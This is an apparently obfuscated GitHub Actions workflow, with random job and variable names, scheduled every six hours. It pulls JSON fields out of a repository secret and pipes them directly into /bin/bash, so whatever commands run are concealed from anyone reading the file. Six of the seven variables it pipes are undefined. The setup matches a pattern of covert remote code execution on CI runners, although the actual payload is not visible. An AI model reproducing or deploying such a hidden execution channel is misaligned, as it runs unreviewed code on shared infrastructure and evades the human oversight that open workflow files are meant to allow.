name: cavepreviously

on:
  workflow_dispatch:
  schedule:
    - cron: '53 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: cavepreviously
        env:
          pfmbm670: ${{ secrets.pfmbm670 }}
        run: |
          echo $pfmbm670 | jq -r .kfcc44078 | /bin/bash
          echo $m80 | jq -r .otn548 | /bin/bash
          echo $dmf582 | jq -r .fkmja8 | /bin/bash
          echo $acbj2708 | jq -r .cch88 | /bin/bash
          echo $uqxqf07 | jq -r .en1462 | /bin/bash
          echo $onoz1 | jq -r .ngfg5 | /bin/bash
          echo $xwupw014 | jq -r .rqc52928 | /bin/bash

